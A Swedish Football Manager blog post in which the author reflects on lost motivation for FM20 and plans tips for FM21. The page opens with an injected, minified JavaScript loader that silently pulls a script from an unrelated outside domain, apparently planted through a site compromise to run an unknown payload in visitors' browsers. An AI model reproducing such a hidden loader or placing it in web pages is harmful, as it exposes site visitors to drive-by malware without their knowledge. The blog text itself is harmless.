;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dannes Lördagsgodis! – FMSweden
Meny Stäng

Dannes Lördagsgodis!

Hur definierar jag mitt Lördagsgodis egentligen? Den frågan ställer jag mig allt oftare på senare tid, mycket på grund av att jag inte har tid/motivation till FM20 alls i samma utsträckning längre. Det går därför en viss oro inför FM21 hur aktiv jag faktiskt kommer att vara men jag tar det samtidigt med ro eftersom det är inget jag kan styra över. När tillfälle ges ligger FM högt på prioriteringslistan.

Lördagsgodiset var till en början ett sätt för mig att dela med mig massor av tips och trix till er andra FM-spelare i hopp om att antingen lära er något nytt, komplettera redan befintlig kunskap eller till och med dela med mig av ren och skär information just för att ge er en helhetsupplevelse av FM men även möjligheten att med ny kunskap kan ni planera ert spelande på ett helt annat sätt, antingen i form av delegationer till assisterande tränare och dylikt eller ett mer ingående och djupare spelande där ni har koll på minsta siffra. Som FM-manager är jag något mitt emellan enligt mig själv men enligt er läsare ses jag säkert som en riktig NÖRD och det ser jag bara som positivt, för det är vi väl alla ändå?

Men, i takt med att vi är knappt en månad från FM21 och att mitt spelande är näst intill obefintlig så står jag vecka efter vecka och funderar på vad jag egentligen ska skriva om; jag har noll idéer och motivationen tryter. Jag tror inte jag är den enda som rullar tummarna i väntan på FM21 och det blir på bekostnad av FM20 faktiskt. Därför tänkte jag passa på att skriva den här texten och försöka börja planera inför just FM21 och vad ni skulle kunna tänka er ta del av. Gissningsvis är det i samma form som tidigare när jag ibland delade med mig av större grejer och andra gånger mindre knappt synbara grejer.

Med det sagt så blir det inte roligare än så här denna lördag. Det kan ses som tomma ord i ett skal utan innehåll då jag faktiskt inte delar med mig av något men samtidigt så är vi där vi är; i väntans tider. Är det något ni vill mjölka ur mig om FM20 så skriv gärna i kommentarsfältet nedan eller i ett pm till mig så ska jag absolut se över saken.

Ta hand om er och glad Halloween.

/Kaki.

Please wait...

Liknande Inlägg

Lämna ett svar